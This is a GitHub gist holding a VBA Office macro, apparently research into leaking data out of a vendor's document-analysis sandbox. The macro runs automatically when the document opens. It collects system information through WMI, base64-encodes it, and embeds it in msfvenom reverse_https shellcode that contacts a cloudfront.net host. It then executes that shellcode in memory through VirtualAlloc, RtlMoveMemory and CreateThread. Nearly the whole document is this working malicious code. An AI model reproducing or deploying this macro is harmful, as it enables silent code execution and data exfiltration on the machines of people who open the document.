Skip to content

Instantly share code, notes, and snippets.

@vp777

vp777/sandbag.vba

Last active October 6, 2020 22:43
Show Gist options
  • Save vp777/d48eed743e802a886185b96a0772367d to your computer and use it in GitHub Desktop.
Save vp777/d48eed743e802a886185b96a0772367d to your computer and use it in GitHub Desktop.
Download ZIP
Raw
sandbag.vba
'Note: this "issue" was reported to checkpoint back in June/2018.
'This is mostly a reverse_https payload generated through msfvenom.
'It's modified on execution time to embed information (in base64 form) about the running environment in the domain used for the reverse
'connection.
'When the document is analysed, we should get back a report showing the "malicious" url that the document attempted to connect, which
'includes our encoded data. Some other potential avenues for data exfiltration are file and registry modifications which are normally
'included in the document analysis report.
'Note: Simple dns queries/http requests even though they are detected, the domain is not displayed in the report. I haven't spent any
'more time on this but I guess the payload has to be properly dressed/execute specific actions before getting back the full details
'of its behavior from the report
#If VBA7 Then
Public Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal Milliseconds As LongPtr)
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Blah As Long, ByVal Xfoszpafz As Long, ByVal Eshgc As LongPtr, Hdltlgljn As Long, ByVal Liiteti As Long, Mwc As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Cwyigir As Long, ByVal Lvz As Long, ByVal Oklkiltom As Long, ByVal Xvohc As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Ixxoogfa As LongPtr, ByRef Bidffkno As Any, ByVal Umdg As Long) As LongPtr
#Else
Public Declare Sub Sleep Lib "kernel32" (ByVal Milliseconds As Long)
Private Declare Function CreateThread Lib "kernel32" (ByVal Blah As Long, ByVal Xfoszpafz As Long, ByVal Eshgc As Long, Hdltlgljn As Long, ByVal Liiteti As Long, Mwc As Long) As Long
Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Cwyigir As Long, ByVal Lvz As Long, ByVal Oklkiltom As Long, ByVal Xvohc As Long) As Long
Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Ixxoogfa As Long, ByRef Bidffkno As Any, ByVal Umdg As Long) As Long
#End If
Public Type POINTAPI
x As Long
y As Long
End Type
Public cPos As POINTAPI
Public Declare Function GetCursorPos Lib "user32" (lpPoint As POINTAPI) As Long
Option Explicit
Private Const clOneMask = 16515072 '000000 111111 111111 111111
Private Const clTwoMask = 258048 '111111 000000 111111 111111
Private Const clThreeMask = 4032 '111111 111111 000000 111111
Private Const clFourMask = 63 '111111 111111 111111 000000
Private Const clHighMask = 16711680 '11111111 00000000 00000000
Private Const clMidMask = 65280 '00000000 11111111 00000000
Private Const clLowMask = 255 '00000000 00000000 11111111
Private Const cl2Exp18 = 262144 '2 to the 18th power
Private Const cl2Exp12 = 4096 '2 to the 12th
Private Const cl2Exp6 = 64 '2 to the 6th
Private Const cl2Exp8 = 256 '2 to the 8th
Private Const cl2Exp16 = 65536 '2 to the 16th
Public Function Encode64(sString As String) As String
Dim bTrans(63) As Byte, lPowers8(255) As Long, lPowers16(255) As Long, bOut() As Byte, bIn() As Byte
Dim lChar As Long, lTrip As Long, iPad As Integer, lLen As Long, lTemp As Long, lPos As Long, lOutSize As Long
For lTemp = 0 To 63 'Fill the translation table.
Select Case lTemp
Case 0 To 25
bTrans(lTemp) = 65 + lTemp 'A - Z
Case 26 To 51
bTrans(lTemp) = 71 + lTemp 'a - z
Case 52 To 61
bTrans(lTemp) = lTemp - 4 '1 - 0
Case 62
bTrans(lTemp) = 43 'Chr(43) = "+"
Case 63
bTrans(lTemp) = 47 'Chr(47) = "/"
End Select
Next lTemp
For lTemp = 0 To 255 'Fill the 2^8 and 2^16 lookup tables.
lPowers8(lTemp) = lTemp * cl2Exp8
lPowers16(lTemp) = lTemp * cl2Exp16
Next lTemp
iPad = Len(sString) Mod 3 'See if the length is divisible by 3
If iPad Then 'If not, figure out the end pad and resize the input.
iPad = 3 - iPad
sString = sString & String(iPad, Chr(0))
End If
bIn = StrConv(sString, vbFromUnicode) 'Load the input string.
lLen = ((UBound(bIn) + 1) \ 3) * 4 'Length of resulting string.
lTemp = lLen \ 72 'Added space for vbCrLfs.
lOutSize = ((lTemp * 2) + lLen) - 1 'Calculate the size of the output buffer.
ReDim bOut(lOutSize) 'Make the output buffer.
lLen = 0 'Reusing this one, so reset it.
For lChar = LBound(bIn) To UBound(bIn) Step 3
lTrip = lPowers16(bIn(lChar)) + lPowers8(bIn(lChar + 1)) + bIn(lChar + 2) 'Combine the 3 bytes
lTemp = lTrip And clOneMask 'Mask for the first 6 bits
bOut(lPos) = bTrans(lTemp \ cl2Exp18) 'Shift it down to the low 6 bits and get the value
lTemp = lTrip And clTwoMask 'Mask for the second set.
bOut(lPos + 1) = bTrans(lTemp \ cl2Exp12) 'Shift it down and translate.
lTemp = lTrip And clThreeMask 'Mask for the third set.
bOut(lPos + 2) = bTrans(lTemp \ cl2Exp6) 'Shift it down and translate.
bOut(lPos + 3) = bTrans(lTrip And clFourMask) 'Mask for the low set.
If lLen = 68 Then
lLen = lLen + 4
lPos = lPos + 4
Else
lLen = lLen + 4
lPos = lPos + 4
End If
Next lChar
If bOut(lOutSize) = 10 Then lOutSize = lOutSize - 2 'Shift the padding chars down if it ends with CrLf.
If iPad = 1 Then 'Add the padding chars if any.
bOut(lOutSize) = 61 'Chr(61) = "="
ElseIf iPad = 2 Then
bOut(lOutSize) = 61
bOut(lOutSize - 1) = 61
End If
Encode64 = StrConv(bOut, vbUnicode) 'Convert back to a string and return it.
End Function
' Credits: (Milk (Sleep+Pause Sub)). (Wayne Spangler (Pause Sub))
Private Sub Pause(ByVal Delay As Single)
Delay = Timer + Delay
If Delay > 86400 Then 'more than number of seconds in a day
Delay = Delay - 86400
Do
DoEvents ' to process events.
Sleep 1 ' to not eat cpu
Loop Until Timer < 1
End If
Do
DoEvents ' to process events.
Sleep 1 ' to not eat cpu
Loop While Delay > Timer
End Sub
Function GetFullName() As String
Dim computer As String
computer = "."
Dim objWMIService, colProcessList As Object
Set objWMIService = GetObject("winmgmts:\\" & computer & "\root\cimv2")
Set colProcessList = objWMIService.ExecQuery _
("SELECT Caption,Processid,Commandline FROM win32_process")
Dim allprocesses
allprocesses = ""
Dim objProcess As Object
For Each objProcess In colProcessList
allprocesses = allprocesses & objProcess.Caption & "," & objProcess.ProcessID & "," & objProcess.CommandLine & Chr(13) & Chr(10)
Next
GetFullName = allprocesses
End Function
Function GetEnclosure() As String
Dim computer As String, infoList
computer = "."
Dim objWMIService, colProcessList As Object
Set objWMIService = GetObject("winmgmts:\\" & computer & "\root\cimv2")
Set infoList = objWMIService.ExecQuery _
("Select * from Win32_SystemEnclosure")
Dim allinfo, d, cvv As String
allinfo = ""
Dim objItem As Object
For Each objItem In infoList
For Each d In objItem.Properties_
If Not IsNull(d.Value) Then
If TypeName(d.Value) = "Variant()" Then
cvv = Join(d.Value, "_")
Else
cvv = CStr(d.Value)
End If
Else
cvv = ""
End If
allinfo = allinfo & d.Name & ": " & CStr(cvv) & Chr(13) & Chr(10)
Next
Next
GetEnclosure = allinfo
End Function
Function GetMouse() As String
Dim computer As String
computer = "."
Dim objWMIService, colProcessList As Object
Set objWMIService = GetObject("winmgmts:\\" & computer & "\root\cimv2")
Set colProcessList = objWMIService.ExecQuery _
("Select * from Win32_PointingDevice")
Dim allprocesses, allinfo
allinfo = ""
Dim objItem As Object
For Each objItem In colProcessList
allinfo = allinfo & "Description: " & objItem.Description & Chr(13) & Chr(10)
allinfo = allinfo & "Device ID: " & objItem.DeviceID & Chr(13) & Chr(10)
allinfo = allinfo & "Device Interface: " & objItem.DeviceInterface & Chr(13) & Chr(10)
allinfo = allinfo & "Double Speed Threshold: " & objItem.DoubleSpeedThreshold & Chr(13) & Chr(10)
allinfo = allinfo & "Handedness: " & objItem.Handedness & Chr(13) & Chr(10)
allinfo = allinfo & "Hardware Type: " & objItem.HardwareType & Chr(13) & Chr(10)
allinfo = allinfo & "INF File Name: " & objItem.InfFileName & Chr(13) & Chr(10)
allinfo = allinfo & "INF Section: " & objItem.InfSection & Chr(13) & Chr(10)
allinfo = allinfo & "Manufacturer: " & objItem.Manufacturer & Chr(13) & Chr(10)
allinfo = allinfo & "Name: " & objItem.Name & Chr(13) & Chr(10)
allinfo = allinfo & "Number Of Buttons: " & objItem.NumberOfButtons & Chr(13) & Chr(10)
allinfo = allinfo & "PNP Device ID: " & objItem.PNPDeviceID & Chr(13) & Chr(10)
allinfo = allinfo & "Pointing Type: " & objItem.PointingType & Chr(13) & Chr(10)
allinfo = allinfo & "Quad Speed Threshold: " & objItem.QuadSpeedThreshold & Chr(13) & Chr(10)
allinfo = allinfo & "Resolution: " & objItem.Resolution & Chr(13) & Chr(10)
allinfo = allinfo & "Sample Rate: " & objItem.SampleRate & Chr(13) & Chr(10)
allinfo = allinfo & "Synch: " & objItem.Synch & Chr(13) & Chr(10)
Next
GetMouse = allinfo
End Function
Public Function ShellRun(sCmd As String) As String
'Run a shell command, returning the output as a string
Dim oShell As Object
Set oShell = CreateObject("WScript.Shell")
'run command
Dim oExec As Object
Dim oOutput As Object
Set oExec = oShell.Exec(sCmd)
Set oOutput = oExec.StdOut
'handle the results as they are written to and read from the StdOut object
Dim s As String
Dim sLine As String
While Not oOutput.AtEndOfStream
sLine = oOutput.ReadLine
If sLine <> "" Then s = s & sLine & vbCrLf
Wend
ShellRun = s
End Function
Sub GetCursor()
Dim LonCStat As Long
LonCStat = GetCursorPos&(cPos)
cPos.x = cPos.x
cPos.y = cPos.y
End Sub
Sub main()
Dim Qbuz As Long, Wyq As Variant, Nwco As Long, kkk, fx, fy, ffx, ffy
#If VBA7 Then
Dim Nnvsfgy As LongPtr, Ueefojwh As LongPtr
#Else
Dim Nnvsfgy As Long, Ueefojwh As Long
#End If
Dim strEnviron As String, allenvs As String, enc As String
Dim zzi As Long
allenvs = ""
'enc = ShellRun("msinfo32 /report C:\Users\admin\AppData\Local\Temp\test.txt")
'enc = Encode64(ShellRun("type C:\Users\admin\AppData\Local\Temp\test.txt"))
allenvs = GetEnclosure
enc = Encode64(CStr(Len(allenvs)) & allenvs)
Wyq = Array(232, 130, 0, 0, 0, 96, 137, 229, 49, 192, 100, 139, 80, 48, 139, 82, 12, 139, 82, 20, 139, 114, 40, 15, 183, 74, 38, 49, 255, 172, 60, 97, 124, 2, 44, 32, 193, 207, 13, 1, 199, 226, 242, 82, 87, 139, 82, 16, 139, 74, 60, 139, 76, 17, 120, 227, 72, 1, 209, 81, 139, 89, 32, 1, 211, 139, 73, 24, 227, 58, 73, 139, 52, 139, 1, 214, 49, 255, 172, 193, _
207, 13, 1, 199, 56, 224, 117, 246, 3, 125, 248, 59, 125, 36, 117, 228, 88, 139, 88, 36, 1, 211, 102, 139, 12, 75, 139, 88, 28, 1, 211, 139, 4, 139, 1, 208, 137, 68, 36, 36, 91, 91, 97, 89, 90, 81, 255, 224, 95, 95, 90, 139, 18, 235, 141, 93, 104, 110, 101, 116, 0, 104, 119, 105, 110, 105, 84, 104, 76, 119, 38, 7, 255, 213, 49, 219, 83, 83, 83, 83, _
83, 104, 58, 86, 121, 167, 255, 213, 83, 83, 106, 3, 83, 83, 104, 187, 1, 0, 0, 232, 151, 5, 0, 0, 47, 56, 116, 112, 90, 80, 117, 67, 77, 45, 80, 45, 57, 48, 76, 122, 82, 53, 103, 55, 113, 116, 81, 76, 80, 79, 116, 99, 112, 109, 120, 75, 73, 118, 75, 90, 81, 79, 49, 71, 90, 90, 89, 108, 75, 103, 95, 113, 78, 87, 68, 120, 78, 57, 80, 104, _
88, 81, 105, 99, 119, 74, 55, 88, 106, 95, 52, 83, 83, 50, 114, 115, 74, 101, 69, 68, 70, 55, 112, 84, 80, 95, 88, 114, 79, 65, 84, 117, 67, 74, 51, 119, 98, 71, 53, 54, 85, 56, 50, 114, 104, 71, 45, 107, 53, 83, 109, 120, 103, 108, 112, 49, 99, 84, 66, 50, 113, 68, 115, 121, 106, 100, 108, 48, 52, 53, 71, 104, 112, 101, 113, 107, 115, 110, 83, 112, _
122, 75, 86, 116, 67, 79, 121, 75, 88, 51, 75, 98, 68, 114, 0, 80, 104, 87, 137, 159, 198, 255, 213, 137, 198, 83, 104, 0, 50, 224, 132, 83, 83, 83, 87, 83, 86, 104, 235, 85, 46, 59, 255, 213, 150, 106, 10, 95, 104, 128, 51, 0, 0, 137, 224, 106, 4, 80, 106, 31, 86, 104, 117, 70, 158, 134, 255, 213, 83, 83, 106, 255, 232, 104, 4, 0, 0, 72, 111, 115, _
116, 58, 32, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, _
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, _
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, _
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, _
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, _
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, _
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, _
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, _
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, _
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, _
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, _
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, _
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, _
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 46, 99, 108, 111, 117, 100, 102, 114, 111, 110, 116, 46, 110, _
101, 116, 13, 10, 0, 86, 104, 45, 6, 24, 123, 255, 213, 133, 192, 117, 24, 104, 136, 19, 0, 0, 104, 68, 240, 53, 224, 255, 213, 79, 15, 133, 92, 251, 255, 255, 232, 80, 0, 0, 0, 106, 64, 104, 0, 16, 0, 0, 104, 0, 0, 64, 0, 83, 104, 88, 164, 83, 229, 255, 213, 147, 83, 83, 137, 231, 87, 104, 0, 32, 0, 0, 83, 86, 104, 18, 150, 137, 226, 255, _
213, 133, 192, 116, 207, 139, 7, 1, 195, 133, 192, 117, 229, 88, 195, 95, 232, 250, 250, 255, 255, 115, 116, 97, 116, 117, 115, 46, 115, 121, 109, 97, 110, 116, 101, 99, 46, 99, 111, 109, 0, 187, 240, 181, 162, 86, 106, 0, 83, 255, 213)
For kkk = 1 To Len(enc)
If kkk >= 1100 Then Exit For
Wyq(402 + kkk) = Asc(Mid(enc, 1100 * 0 + kkk, 1))
Next kkk
Nnvsfgy = VirtualAlloc(0, UBound(Wyq), &H1000, &H40)
For Nwco = LBound(Wyq) To UBound(Wyq)
Qbuz = Wyq(Nwco)
Ueefojwh = RtlMoveMemory(Nnvsfgy + Nwco, Qbuz, 1)
Next Nwco
Ueefojwh = CreateThread(0, 0, Nnvsfgy, 0, 0, 0)
End Sub
Sub Auto_Open()
main
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment